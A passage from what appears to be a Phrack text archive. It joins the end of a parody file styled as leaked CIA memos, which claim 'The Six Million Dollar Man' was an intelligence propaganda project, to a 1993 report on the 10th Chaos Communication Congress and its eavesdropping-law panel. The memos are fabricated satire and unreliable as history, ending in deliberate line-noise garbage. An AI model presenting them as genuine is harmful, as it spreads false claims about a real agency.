  8952.      PSYOPS' proposed project involves the production of a network television
  8953. show, produced in part with Company funds, Pro-US propagandizing, which will
  8954. lionize the American Intelligence Community and plant the seed in the public's
  8955. mind that projects like CAPRICORN and UMENSCH are impossible -- due to the
  8956. inherent silliness of the show's plotlines, week after week.
  8957.  
  8958.                                   (4)
  8959.  
  8960. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8961. electronic form outside of your section.
  8962.  
  8963. [CONTINUE] ^M
  8964.  
  8965.  
  8966.  
  8967.                                                           DL 433-54-3937
  8968.                                                                 10/28/71
  8969.  
  8970.  
  8971.                      Central Intelligence Agency
  8972.                          Internal Memorandum
  8973.  
  8974.                             PPYRUS SECTION
  8975.  
  8976.  
  8977.  
  8978. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8979. electronic form outside of your section.
  8980.  
  8981.  
  8982. BACKGROUND, PROJECT DPULTRA (cont'd)
  8983. ----------  ------- -------
  8984.  
  8985.      DPULTRA's success is directly related to the Nielsen ratings it can
  8986. garnish and to ensure its success, PSYOPS personnel will be involved in
  8987. writing the scripts.
  8988.      PSYOPS suggests peppering the show's plots with psychological archetypes
  8989. -- symbols from Jung's collective unconscious -- and possibly even subliminals
  8990. (if need be).  The story line will, nevertheless, be played straight but also
  8991. utterly implausibly.
  8992.  
  8993.      I would like to discuss DPULTRA further with you in person at our next
  8994. Monday-morning meeting.
  8995.  
  8996.  
  8997.  
  8998.  
  8999.  
  9000.  
  9001.  
  9002.  
  9003.  
  9004.  
  9005.  
  9006.  
  9007.  
  9008.  
  9009.  
  9010.  
  9011.  
  9012.  
  9013.  
  9014.  
  9015.  
  9016.  
  9017.  
  9018.  
  9019.  
  9020.  
  9021.  
  9022.  
  9023.                                   (5)
  9024.  
  9025. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9026. electronic form outside of your section.
  9027.  
  9028. [CONTINUE] ^M
  9029.  
  9030.  
  9031.  
  9032.                                                           DL 433-54-3958
  9033.                                                                 11/07/71
  9034.  
  9035.  
  9036.                      Central Intelligence Agency
  9037.                          Internal Memorandum
  9038.  
  9039.                             PPYRUS SECTION
  9040.  
  9041.  
  9042.  
  9043. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9044. electronic form outside of your section.
  9045.  
  9046.  
  9047. TO:   Thomas J. Kelley, Director, PPYRUS Section
  9048.  
  9049. FROM: Bill Brown, PP Deputy Chief
  9050.  
  9051. SUBJ: DPULTRA
  9052.  
  9053.  
  9054. PROJECT DPULTRA OUTLINE
  9055. ------- ------- -------
  9056.  
  9057.      Following our meeting Monday, this is an update on DPULTRA.
  9058.  
  9059.      In keeping with our RMD objectives, we've begun working on ideas this
  9060. week.  Much progress, although finished scripts are probably a month or two
  9061. away, depending on the final series terms from American Broadcasting.
  9062.      We’ve settled on character names and sketches:
  9063.  
  9064.  
  9065.                               DRAMATIS PERSONAE
  9066.  
  9067. Dr. Rudy Wells,   An otherwise unremarkable man, the genius behind BIONICs
  9068. Oscar Goldman,    Director of a secret governmental intelligence agency, OSI
  9069. Steve Austin,     Astronaut/Test Pilot/OSI Agent; renowned as the
  9070.                         first Man on the Moon.  Similarity to the name
  9071.                         Sam Houston results from the necessity to attract
  9072.                         Texas viewers particularly (as well as Californians).
  9073.  
  9074.  
  9075.      Following is a list of show ideas for the first season, along with input
  9076. from the PSYOPS officers.  PSYOPS wants us to plant collective archetypes and
  9077. possibly subliminals in order to carve the show's subtext into the mind as
  9078. deep as possible, and to generate the largest market share possible.
  9079.      These psychological implants will be joined with or disguised under
  9080. ephemeral pop culture references, such as UFOs, Aztecs, Bigfoot, Cold Warrior,
  9081. Earthquakes, the mystique of the American Indian, and the paranormal.
  9082.  
  9083.  
  9084.  
  9085.  
  9086.  
  9087.  
  9088.                                   (1)
  9089.  
  9090. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9091. electronic form outside of your section.
  9092.  
  9093. [CONTINUE] ^M
  9094.  
  9095.  
  9096.                                                           DL 433-54-3958
  9097.                                                                 11/07/71
  9098.  
  9099.  
  9100.                      Central Intelligence Agency
  9101.                          Internal Memorandum
  9102.  
  9103.                             PPYRUS SECTION
  9104.  
  9105.  
  9106.  
  9107. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9108. electronic form outside of your section.
  9109.  
  9110. PROJECT DPULTRA OUTLINE (cont'd)
  9111. ------- ------- -------
  9112.  
  9113.                            SUPPORTING CHARACTERS
  9114.  
  9115. Venus Probe,      Earth-launched probe mistakenly returns, wreaking havoc
  9116. Sasquatch,        Otherwise known as "Big Foot"; a UFOnaut with BIONICs
  9117. Farrah Fawcett,   Reporter/Journalist foil for Steve Austin
  9118. Aztec Warrior,    _Chariots of the Gods_ to its ultimate conclusion
  9119. Bionic Boy,       Temporarily BIONIC-enabled
  9120. Gary Savin,       Heretofore unknown, rogue $7 million man
  9121. William Shatner,  ...and dolphins.  "Something Wonderful..." happens to
  9122.                         astronaut Bill on one of his space-walks
  9123. Fembots,          Female grotesques; "All this, and BIONICs, too!"  Evil
  9124.                         androids created by an unnamed, nefarious agency
  9125.  
  9126.      Abridged list of possible episodes include:
  9127.  
  9128. Sasquatch
  9129. ---------
  9130.  
  9131. During an OSI science investigation of the San Andreas fault in the wilderness
  9132. of Northern California, Steve encounters Big Foot.  Steve later learns that
  9133. Big Foot is the product of extra-terrestrial genetics and cybernetics, but his
  9134. purpose on Earth is never clarified.  In a later episode, Steve re-visits the
  9135. heavily forrested area and initiates a friendship with Sasquatch, eventually
  9136. saving his life.
  9137.  
  9138. Venus Probe
  9139. -----------
  9140.  
  9141. An interplanetary probe (like the planned Viking probes) destined for Venus
  9142. slingshots through the alien atmosphere and returns to Earth.  Its computer
  9143. program doesn't realize that anything's wrong, so it begins its collection
  9144. routines.  Unfortunately, it has returned to our planet with an extremely
  9145. tough armor plating (resulting from a chemical reaction with Venus's
  9146. atmosphere) and it's zigzagging its way through Southern California.  It
  9147. possesses wicked collection equipment which in this environment are effective
  9148. weapons.  Anyone who gets near it is in great danger.  Eventually, Steve and
  9149. the national guard defeat the device by luring it into an open pit filled with
  9150. very caustic acid.
  9151.  
  9152.  
  9153.  
  9154.                                   (2)
  9155.  
  9156. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9157. electronic form outside of your section.
  9158.  
  9159. [CONTINUE] ^M
  9160.  
  9161.                                                           DL 433-54-3958
  9162.                                                                 11/07/71
  9163.  
  9164.  
  9165.                      Central Intelligence Agency
  9166.                          Internal Memorandum
  9167.  
  9168.                             PPYRUS SECTION
  9169.  
  9170.  
  9171. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9172. electronic form outside of your section.
  9173.  
  9174. PROJECT DPULTRA OUTLINE (cont'd)
  9175. ------- ------- -------
  9176.  
  9177. Amnesia
  9178. -------
  9179.  
  9180. As the result of a head injury, Steve is stricken with amnesia.  Consequently,
  9181. forgets that he possesses bionic powers.  He ends up living out an alternate
  9182. possible life -- moves in with a woman and gets a job as a construction
  9183. worker.  Everything is fine until Steve happens upon a woman and her child,
  9184. pinned inside a wrecked car.  He tears away the metal and extricates the
  9185. people, who are grateful but become frightened when they see wires sticking
  9186. out of a tear in his flannel shirt.  Eventually, OSI catches up to him before
  9187. anything too out of hand occurs, and Steve regains his memory by episode's
  9188. end.
  9189.  
  9190.      If this show is a success in its first season, PSYOPS would like to
  9191. consider a spin-off involving a second BIONIC character.  The spin-off would
  9192. include:
  9193.  
  9194.                               ADDITIONAL CHARACTERS
  9195.  
  9196. Jamie Sommers,    Substitute Teacher/ex-Tennis Pro; an unlikely OSI agent;
  9197.                         A love-interest for Steve, Jamie obtains her BIONICs
  9198.                         after a parachuting accident
  9199. Max the Dog,      Formerly a laboratory subject, horribly burnt in a fire;
  9200.                         Now BIONIC-enabled.  Psychologically traumatized, Max
  9201.                         goes berserk at the first sign of flame
  9202.  
  9203. Jamie Sommers
  9204. -------------
  9205.  
  9206. Jamie, a Junior Highschool substitute teacher and ex-Tennis pro, and Steve are
  9207. engaged to be married.  At this point, Jamie knows nothing of Steve's
  9208. involvement with OSI or his BIONIC abilities.  On a vacation parachuting trip,
  9209. Jamie is injured, paralyzed.  Steve pleads with Dr. Wells to restore her limbs
  9210. through BIONICs.  Wells accedes.  Except that Jamie has amnesia and has no
  9211. idea who Steve is.
  9212.      Jamie is instructed in her new BIONIC abilities, and begins to exercise
  9213. them, when her body rejects the BIONIC implants, physically and emotionally
  9214. traumatizing Jamie.  OSI eventually solves the implant rejection problem, but
  9215. Rudi cautions Steve that if he tells her of her past, it may induce the trauma
  9216. of the BIONIC rejection.  Steve lives with the pain of knowing that Jamie is
  9217. his first love and that, for fear of her safety, can never tell her.
  9218.  
  9219.                                   (3)
  9220.  
  9221. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9222. electronic form outside of your section.
  9223.  
  9224. [CONTINUE] ^M
  9225.  
  9226.  
  9227.                                                           DL 433-54-3958
  9228.                                                                 11/07/71
  9229.  
  9230.  
  9231.                      Central Intelligence Agency
  9232.                          Internal Memorandum
  9233.  
  9234.                             PPYRUS SECTION
  9235.  
  9236.  
  9237.  
  9238. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9239. electronic form outside of your section.
  9240.  
  9241. PROJECT DPULTRA OUTLINE (cont'd)
  9242. ------- ------- -------
  9243.  
  9244. Aztec Warrior
  9245. ----- -------
  9246.  
  9247. Investigating an abandoned WW II bunker along the California coast which seems
  9248. to be emitting powerful radio-frequencies, Jamie discovers that an ancient
  9249. Aztec pyramid lies below the bunker's foundation and is now accessible through
  9250. a hidden tunnel.  In the pyramid, Jamie is confronted with an 800-year-old
  9251. Aztec warrior bent on protecting the contents of the pyramid and repelling
  9252. intruders.  In an allusion to CHARIOTS OF THE GODS, extra-terrestrials are
  9253. receiving from the pyramid's beacon the electronic version of an invitation to
  9254. re-visit the planet.  Jamie learns, however, that chemicals seeded into the
  9255. atmosphere as part of a NASA project to end continental drought will
  9256. ultimately interfere with the propulsion system of the alien craft.  Fearing
  9257. the accidental destruction of the aliens will bring extra-terrestrial
  9258. retaliation, Jamie thwarts the Aztec guard and destroys the beacon.
  9259.  
  9260.  
  9261.  
  9262.  
  9263.  
  9264.  
  9265.  
  9266.  
  9267.  
  9268.  
  9269.  
  9270.  
  9271.  
  9272.  
  9273.  
  9274.  
  9275.  
  9276.  
  9277.  
  9278.  
  9279.  
  9280.  
  9281.  
  9282.  
  9283.                                   (4)
  9284.  
  9285. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9286. electronic form outside of your section.
  9287.  
  9288. [CONTINUE] ^M
  9289.  
  9290.  
  9291.                                                           DL 433-54-3958
  9292.                                                                 12/10/73
  9293.  
  9294.  
  9295.                      Central Intelligence Agency
  9296.                          Internal Memorandum
  9297.  
  9298.                             PPYRUS SECTION
  9299.  
  9300.  
  9301.  
  9302. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  9303. electronic form outside of your section.
  9304.  
  9305.  
  9306. TO:   Bill Brown, PP Deputy Chief
  9307.  
  9308. FROM: Thomas J. Kelley, Director, PPYRUS Section
  9309.  
  9310. SUBJ: DPULTRA
  9311.  
  9312.  
  9313.      Nearly two years into the project, I congratulate you on DPULTRA's
  9314. success; the show has consistently rated high in the Nielsens, topping
  9315. "Starsky & Hutch" and occasionally beating out "M*A*S*H*".
  9316.      However, there seem to be several problems and the show requires a nearly
  9317. intolerable suspension of disbelief.  To wit:
  9318.  
  9319.       1.    Running at 60 mph, why doesn't the Bionic Man's sneakers ever
  9320.             wear out?
  9321.       2.    Steve Austin never received a Bionic heart, spine, respiratory
  9322.             system, musculature or skeleture.  How is it that his body
  9323.             doesn't collapse when he lifts objects that weigh tons?
  9324.       3.    Most of Steve's body seems to be metallic; how does he make
  9325.             it past airport metal detectors?
  9326.       4.    How can Steve's Bionics defy principles of physics, like inertia?
  9327.       5.    Steve's Bionic implants are nuclear-powered -- an energy source
  9328.             potentially capable of generating more heat than the sun.  How
  9329.             can Steve's Bionics slow down and even fail, when exposed to cold?
  9330.       6.    Steve Austin's Bionics cost $6 Million -- a sum that seems
  9331.             laughably inexpensive.  Why is the Bionic Woman's pricetag
  9332.             Classified?
  9333.       7.    How can a world-famous, instantly recognizable astronaut make
  9334.             a "perfect undercover agent"?
  9335.       8.    A bionic dog?  What's next?  A bionic earthworm?  A bionic
  9336.             tarantula?
  9337.       9.    Jamie Sommers' cover includes continuing her vocation as a
  9338.             substitute teacher; how does she make time to be a secret agent?
  9339.       10.   Where do the Fembots come from?  Are they important to the show?
  9340.       11.   Re: The Venus Probe episode -- why is a probe whose purpose is
  9341.             to collect soil samples, heavily endowed with weapons?  How can
  9342.             that probe not realize it's not on Venus?  If it's armored enough
  9343.             to withstand the atmosphere of Venus, how was Steve able to
  9344.             destroy it in a pit of acid?  Why was it malevolent?
  9345. åƒñܡȈ⁄ÿUÓj
  9346.                                 ÁßJ œ˛˛æÔ∏/Δø=flÆˇ~ œ◊Ô_¸Ô„^˚?Œææ<œˇ˛=˛ØÓfiæ~|ˇ\ÔH
  9347.                                                                               +˙
  9348.                                                                               Ô˙
  9349. ®¶´
  9350. ÇÙŒ∏1¸¿rG-ö‘Œx∫^P†W·flO˙V2/¿flπ»fi”ˇ3ø‡-AªÎ∫ÌF".Û¯Ht· Õ sã`˜–˙mø}ΔyN|∂Øh °.x]i√
  9351.  
  9352. NO CARRIER
  9353.  
  9354. ------------------------[ END OF FILE ]----------------------------
  9355.                               ==Phrack Magazine==
  9356.  
  9357.                  Volume Five, Issue Forty-Five, File 13 of 28
  9358.  
  9359. ****************************************************************************
  9360.  
  9361. The 10th Chaos Computer Congress
  9362.  
  9363. by Manny E. Farber
  9364.  
  9365.   Armed only with an invitation in English addressed to the "global
  9366. community" and a small pile of German Marks, I arrived at the
  9367. Eidelstedter Buergerhaus about an hour or so before the beginning of
  9368. the 10th Chaos Communication Congress (subtitled "Ten years after
  9369. Orwell"), sponsored by the (in)famous Chaos Computer Club.  The
  9370. Buergerhaus (literally, "citizen's house") turned out to be a modest
  9371. community hall; needless to say, not all invited showed up.  The
  9372. Congress took place between the 27th and the 29th of December.  As the
  9373. title implies, social as well as technical issues were on the docket.
  9374.  
  9375.   After forking over 30 DM (about $20) for a pass for the first two
  9376. days of the Congress, I sort of felt like asking for a schedule, but
  9377. refrained, thinking that asking for scheduled chaos might seem a bit
  9378. odd.  I went to the cafeteria for breakfast.  An organizer started out
  9379. announcing, "Anyone who wants to eat breakfast pays 5 Marks, and gets a
  9380. stamp, which--no, rather, anyone who wants breakfast pays 5 Marks and
  9381. eats breakfast."
  9382.  
  9383.   The atmosphere was quite collegial and informal, with little more
  9384. order than was absolutely necessary.  The approximately 150 attendees
  9385. were predominantly German (a few from Switzerland and Holland, at least
  9386. -- and probably only -- one from the United States, namely myself),
  9387. male, and technically oriented.  (During an explanation of the
  9388. mathematical algorithm underlying electronic cash, a non-techie
  9389. objected, "But I don't want to have to think up a 200-digit random
  9390. number every time I buy something!"  It was explained to him that this
  9391. was done by software in the chip-card ...).
  9392.  
  9393.   Although not mentioned in the invitation, not a word of English was to
  9394. be heard; all the events were conducted in German.  Some were conducted
  9395. in a "talk show" format, with a host asking questions, simplifying
  9396. answers, making jokes.  A television network carried the video from the
  9397. auditorium to other rooms throughout the building (albeit without
  9398. sound) along with up-to-the-minute event schedules.
  9399.  
  9400.   The tone of the discussions of how electronic cash could be
  9401. embezzled, or chip cards abused, digital signatures forged, etc., was
  9402. constructive rather than destructive.  And it was balanced, i.e. not
  9403. only "how could a malicious individual embezzle money?" was discussed,
  9404. but also "how could the government use chip cards to reduce people's
  9405. privacy?"  Here, the "hackers" were hackers in the positive sense of
  9406. understanding a technology, not in the negative sense of wreaking
  9407. havoc.  It was, however, noted that trying out a potential weakness of
  9408. the "EuroScheck" cash cards was quite easy:  it would require buying a
  9409. card reader for 1,500 DM and maybe a week of time.
  9410.  
  9411.   The question of technical solutions to "big brother" did come up in
  9412. the presentations about chip cards.  The danger is that a pile of cards
  9413. is eliminated in favor of a card containing someone's driver's license,
  9414. driving record (maybe), employee information, credit information, etc.
  9415. etc.  A chip card could theoretically be programed to give out *only*
  9416. the information absolutely necessary, e.g. telling a policeman only
  9417. that someone is allowed to drive, without disclosing his identity.
  9418.  
  9419.   The "Hackzentrum" (Hacking Center) turned out to be a room filled
  9420. with networked computers and people hacking on them.  It seemed mostly
  9421. harmless.  (I nevertheless did not try a remote login -- I had no
  9422. reason to doubt good intentions, but on the other hand, who knows who
  9423. wrote or replaced the keyboard driver and what sort of supplemental
  9424. functionality it might have?)  The packet radio room had a "Digi"
  9425. repeating station and, true to the ham radio tradition, where the
  9426. conversation centers on who is talking to whom and how well they hear
  9427. each other and on what other frequency they might hear each other
  9428. better, the computers attached were mostly displaying maps of the
  9429. packet radio network itself.  I didn't delve very deeply into the
  9430. "Chaos Archive," but noticed a collection of maintenance sheets for
  9431. telephone equipment among CCC newsletters and other paraphenalia.
  9432.  
  9433.   Some "signs of the Congress":
  9434.  
  9435.     - Bumper sticker:  "I (heart) your computer"
  9436.     - Telephone stickers:  "Achtung, Abhoergefahr" ("Attention,
  9437.       Eavesdropping danger"; and the German PTT logo transformed into a
  9438.       pirate insignia, with the words "Telefun - Mobilpunk" (derived from
  9439.       "Telefon - Mobilfunk")
  9440.     - T-shirt:  "Watching them (eye-ball) watching us"
  9441.     - Post-It Note pad (for sale for DM 1.50):  a pad of about 50,
  9442.       pre-printed with a hand-written note:  "Vorsicht, Stoerung.
  9443.       Automat macht Karte ungueltig" ("Careful--Defect. Machine makes
  9444.       card invalid")
  9445.     - Word coinage:  "Gopher-space"
  9446.     - Stamp:  "ORIGINALE KOPIE" ("ORIGINAL COPY")
  9447.  
  9448.   The press were told not to take pictures of anyone without their
  9449. explicit permission.
  9450.  
  9451.   Schedules were distributed throughout the Congress.  By the evening
  9452. of the 27th, a schedule for the 28th, "Fahrplan 28.12 Version 2.0," was
  9453. already available ("Fahrplan" means a bus/train schedule; this is
  9454. presumably an "in" joke).  By 17:30 on the 28th, "Fahrplan 28.12
  9455. Version 2.7" was being distributed.  (I missed most of the intervening
  9456. versions; presumably they were neatly filed away in the Chaos Archive
  9457. by then ...)
  9458.  
  9459.   The scheduled events (in translation) were as follows; a "*" means
  9460. that I have included some comments later in this report:
  9461.  
  9462.  
  9463. December 27, 1993
  9464.  
  9465. - Welcoming/opening
  9466. - How does a computer work?
  9467. - ISDN:  Everything over one network
  9468. - Internet and multimedia applications:  MIME/Mosaik/Gopher
  9469. - Data transport for beginners
  9470. - Chip-cards:  Technology
  9471. * Media and information structures:  How much truth remains?  Direct
  9472.   democracy:  information needs of the citizen
  9473. - Encryption for beginners, the practical application of PGP
  9474. * Alternative networks:  ZAMIRNET, APS+Hacktic, Green-Net, Knoopunt,
  9475.   Z-Netz and CL
  9476.  
  9477.  
  9478. December 28, 1993
  9479.  
  9480. - Encryption:  Principles, Systems, and Visions
  9481. - Modacom "wireless modem"
  9482. - Electronic Cash
  9483. - Bulletin board protocols: Functional comparison and social form, with the
  9484.   example of citizen participation
  9485. - Discussion with journalist Eva Weber
  9486. - Net groups for students, Jan Ulbrich, DFN
  9487. * What's left after the eavesdropping attack?  Forbidding encryption?
  9488.   Panel:  Mitglied des Bundestags (Member of Parliament) Peter Paterna,
  9489.   Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar,
  9490.   a journalist from Die Zeit, a representative from the German PTT, a
  9491.   student writing a book about related issues, and a few members of the
  9492.   Chaos Computer Club
  9493. - Cyber Bla:  Info-cram
  9494. * How does an intelligence service work?  Training videos from the
  9495.   "Stasi" Ministrium fuer STAatsSIcherheit (Ministry for National Security)
  9496. - System theory and Info-policies with Thomas Barth
  9497. - Science Fiction video session:  Krieg der Eispiraten
  9498.   ("War of the ice pirates")
  9499.  
  9500.  
  9501. December 29, 1993
  9502.  
  9503. - Thoughts about organization ("Urheben")
  9504. - Computer recycling
  9505. - Dumbness in the nets:  Electronic warfare
  9506. - Lockpicking:  About opening locks
  9507. - The Arbeitsgemeinschaft freier Mailboxen introduces itself
  9508. - In year 10 after Orwell ... Visions of the hacker scene
  9509.  
  9510.  
  9511. -------------------------------------------------------------------------------
  9512. THE EAVESDROPING ATTACK
  9513.  
  9514.   This has to do with a proposed law making its way through the German
  9515. Parliament.  The invitation describes this as "a proposed law reform
  9516. allowing state authorities to listen in, even in private rooms, in
  9517. order to fight organized crime."  This session was the centerpiece of
  9518. the Congress.  Bayerische Rundfunk, the Bavarian sender, sent a
  9519. reporter (or at least a big microphone with their logo on it).  The
  9520. panel consisted of:
  9521.  
  9522. MdB - Mitglied des Bundestags (Member of Parliament) Peter Paterna
  9523. DsB - Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar
  9524. Journalist - from Die Zeit
  9525. PTT - a representative from the German PTT
  9526. Student - writing a book about related issues
  9527. CCC - a few members of the Chaos Computer Club
  9528.  
  9529.   My notes are significantly less than a word-for-word transcript.  In
  9530. the following, I have not only excerpted and translated, but
  9531. reorganized comments to make the threads easier to follow.
  9532.  
  9533.  
  9534.   IS IT JUSTIFIED?
  9535.  
  9536. MdB - There is massive concern ("Beunruhigung") in Germany:  7 million
  9537. crimes last year.  Using the US as comparison for effectiveness of
  9538. eavesdroping, it's only applicable in about 10-20 cases:  this has
  9539. nothing to do with the 7 million.  The congress is nevertheless
  9540. reacting to the 7 million, not to the specifics.  In principle, I am
  9541. opposed and have concerns about opening a Pandora's box.
  9542.  
  9543. CCC #1 - The 7 million crimes does not surprise me in the least.  I am
  9544. convinced that there is a clear relationship between the number of laws
  9545. and the number of crimes.  When you make more laws, you have more
  9546. crimes.  Every second action in this country is illegal.
  9547.  
  9548. Journalist - Laws/crimes correlation is an over-simplification.  There
  9549. are more murders, even though there are no more laws against it.
  9550.  
  9551. MdB - There is a conflict between internal security, protecting the
  9552. constitution, and civil rights.  How dangerous  is 6 billion Marks of
  9553. washed drug money to the nation?  Taking the US as an example, the
  9554. corrosion may have gone so far that it's too late to undo it.  I hope
  9555. that this point hasn't been reached yet in Germany.
  9556.  
  9557. DsB - I am worried about a slippery slope.  There is a tradeoff between
  9558. freedom and security, and this is the wrong place to make it; other
  9559. more effective measures aren't being taken up.
  9560.  
  9561.  
  9562.   EFFECTIVENESS OF CONTROLS ON EAVESDROPING
  9563.  
  9564. MdB - Supposedly federal controls are effective.  Although there are
  9565. very few eavesdroping cases, even if you look at those that are
  9566. court-approved, it's increasing exponentially.  No proper brakes are
  9567. built into the system.  As for controls for eavesdroping by the
  9568. intelligence service, there is a committee of  three members of
  9569. parliament, to whom all cases must be presented.  They have final say,
  9570. and I know one of the three, and have relatively much trust in him.
  9571. They are also allowed to go into any PTT facility anytime, unannounced,
  9572. to see whether or not something is being tapped or not.
  9573.  
  9574. MdB - Policies for eavesdroping:  if no trace of an applicable
  9575. conversation is heard within the first "n" minutes, they must terminate
  9576. the eavesdroping [...]  The question is, at which point the most
  9577. effective brakes and regulations should be applied:  in the
  9578. constitution?  in the practice?
  9579.  
  9580. PTT - True, but often the actual words spoken is not important, rather
  9581. who spoke with whom, and when.
  9582.  
  9583. DsB - There is no catalog for crimes, saying what measures can be
  9584. applied in investigating which crimes.  It's quite possible to use them
  9585. for simple crimes, e.g. speeding.  There is no law saying that the PTT
  9586. *has to* store data; they *may*.  They can choose technical and
  9587. organizational solutions that don't require it.
  9588.  
  9589. MdB - This is a valid point, I don't waive responsibility for such
  9590. details.  The PTT could be required to wipe out detailed information as
  9591. soon as it is no longer needed, e.g. after the customer has been billed
  9592. for a call.
  9593.  
  9594.  
  9595.   TECHNICAL TRENDS
  9596.  
  9597. Journalist - Digital network techniques make it easy to keep trails,
  9598. and there is an electronic trail produced as waste product, which can
  9599. be used for billing as well as for other purposes.  Load measurements
  9600. are allowable, but it can also be used for tracking movements.
  9601.  
  9602. DsB - The PTT claims they need detailed network data to better plan the
  9603. network.  The government says they need details in order to be able to
  9604. govern us better.
  9605.  
  9606. DsB - In the past, the trend has always been to increasingly
  9607. identificable phone cards.  There is economic pressure on the customer
  9608. to use a billing card instead of a cash card, since a telephone unit
  9609. costs less.  With "picocells," your movement profile is getting more
  9610. and more visible.
  9611.  
  9612. PTT - As for the trend towards less-anonymous billing-cards:  with the
  9613. new ISDN networks, this is necessary.  Billing is a major cost, and
  9614. this is just a technical priority.
  9615.  
  9616. Student - As for techniques to reduce potential for eavesdroping, it
  9617. is for example technically possible to address a mobile phone without
  9618. the network operator needing to know its position.  Why aren't such
  9619. things being pursued?
  9620.  
  9621. PTT - UMTS is quite preliminary and not necessarily economically
  9622. feasible.  [Comments about debit cards].  We have more interest in
  9623. customer trust than anything else. But when something is according to
  9624. the law, we have no option other than to carry it out.  But we don't do
  9625. it gladly.
  9626.  
  9627.  
  9628.   THE BIG CONSPIRACY?
  9629.  
  9630. CCC #2 - I don't give a shit about these phone conversations being
  9631. overheard.  I want to know why there is such a big controversy.  Who
  9632. wants what?  Why is this so important?  Why so much effort?  Why are so
  9633. many Mafia films being shown on TV when the eavesdroping law is being
  9634. discussed?  What's up?  Why, and who are the people?
  9635.  
  9636. Student - I am writing a book about this, and I haven't figured this
  9637. out myself.  My best theory:  there are some politicians who have lost
  9638. their detailed outlook ("Feinbild"), and they should be done away with
  9639. ("abgeschaffen").
  9640.  
  9641. PTT - We're in a difficult position, with immense investments needed to
  9642. be able to overhear phone conversations [in digital networks (?)].  We
  9643. have no interest in a cover-up.
  9644.  
  9645. MdB - As for the earlier question about what NATO countries may do.
  9646. During the occupation of Berlin, they did want they wanted on the
  9647. networks.  In western Germany, it has always been debated.  Funny
  9648. business has never been proved, nor has suspicion been cleared up.
  9649.  
  9650. CCC #2 - After further thought, I have another theory.  American
  9651. companies are interested in spying on German companies in order to get
  9652. a jump on their product offerings.
  9653.  
  9654. MdB - That's clear, but there are more benign explanations.  Government
  9655. offices tend towards creating work.  Individuals are promoted if their
  9656. offices expand, and they look for new fields to be busy in.  In Bonn,
  9657. we've gone from 4,000 people to 24,000 since the 50's.
  9658.  
  9659. CCC #1 (to MdB) - Honestly, I don't see why you people in Bonn are
  9660. anything other than one of these impenetrable bureaucracies like you
  9661. described, inaccessible, out of touch with reality, and interested only
  9662. in justifying their own existence.
  9663.  
  9664. MdB - Well, *my* federal government isn't that.
  9665.  
  9666.  
  9667.   CLIPPER CHIP CONTROVERSY
  9668.  
  9669. Student - Observation/concern:  in the US, AT&T's encryption system is
  9670. cheap and weak.  If this becomes a de facto standard, it is much harder
  9671. to introduce a better one later.
  9672.  
  9673. Journalist - In the US, the Clipper chip controversy has centered more
  9674. on the lost business opportunities for encryption technology, not on
  9675. principles.  There every suggestion for forbidding encryption has
  9676. encountered stiff opposition.
  9677.  
  9678. Student -  As for the Clipper algorithm, it's quite easy to invite
  9679. three experts to cursorily examine an algorithm (they weren't allowed
  9680. to take documents home to study it) and then sign-off that they have no
  9681. complaints.
  9682.  
  9683. Journalist - As for the cursory rubber-stamping by the three experts
  9684. who certified the Clipper algorithm, my information is that they had
  9685. multiple days of computing days on a supercomputer available.  I don't
  9686. see a problem with the algorithm.  The problem lies in the "trust
  9687. centers" that manage the keys.  I personally don't see why the whole
  9688. question of cryptology is at all open ("zugaenglich") for the
  9689. government.
  9690.  
  9691.  
  9692.   CONCLUDING REMARKS
  9693.  
  9694. DsB - The question is not only whether or not politicians are separated
  9695. from what the citizens want, but also of what the citizens want.
  9696. Germans have a tendency to valuing security.  Different tradition in
  9697. the US, and less eavesdroping.  I can imagine how the basic law
  9698. ("Grundgesetz") could be eliminated in favor of regulations designed to
  9699. reduce eavesdroping, the trade-off you (MdB) mentioned earlier.  The
  9700. headlines would look like "fewer cases of eavesdroping", "checks built
  9701. in to the system," etc., everyone would be happy, and then once the law
  9702. has been abolished, it would creep back up, and then there's no limit.
  9703.  
  9704. MdB - (Nods agreement)
  9705.  
  9706. CCC #2 - There are things that must be administered centrally (like the
  9707. PTT), and the government is the natural choice, but I suggest that we
  9708. don't speak of the "government," but rather of "coordination."  This
  9709. reduces the perceived "required power" aspect ... As a closing remark,
  9710. I would like to suggest that we take a broader perspective, assume that
  9711. a person may commit e.g. 5,000 DM more of theft in his lifetime, live
  9712. with that, and save e.g. 100,000 DM in taxes trying to prevent this
  9713. degree of theft.
  9714.  
  9715. -------------------------------------------------------------------------------
  9716. MEDIA AND INFORMATION STRUCTURES
  9717.  
  9718.   In this session, a lot of time was wasted in pointless philosophical
  9719. discussion of what is meant by Truth, although once this topic was
  9720. forcefully ignored, some interesting points came up (I don't
  9721. necessarily agree or disagree with these):
  9722.  
  9723. - In electronic media, the receiver has more responsibility for judging
  9724. truth placed on his shoulders.  He can no longer assume that the sender
  9725. is accountable.  With "Network Trust," you would know someone who knows
  9726. what's worthwhile, rather than filtering the deluge yourself.  A
  9727. primitive form of this already exists in the form of Usenet "kill" files.
  9728.  
  9729. - A large portion of Usenet blather is due to people who just got their
  9730. accounts cross-posting to the entire world.  The actual posting is not
  9731. the problem, rather that others follow it up with a few dozen messages
  9732. debating whether or not it's really mis-posted, or argue that they
  9733. should stop discussing it, etc.  People are beginning to learn however,
  9734. and the ripple effect is diminishing.
  9735.  
  9736. - Companies such as Microsoft are afraid of the Internet, because its
  9737. distributed form of software development means they are no longer the
  9738. only ones able to marshal 100 or 1,000 people for a windowing system
  9739. like X-Windows or Microsoft Windows.
  9740.  
  9741. - If someone is trying to be nasty and knows what he's doing, a Usenet
  9742. posting can be made to cost $500,000 in network bandwidth, disk space, etc.
  9743.  
  9744. - At a Dutch university, about 50% of the network bandwidth could have
  9745. been saved if copies of Playboy were placed in the terminal rooms.
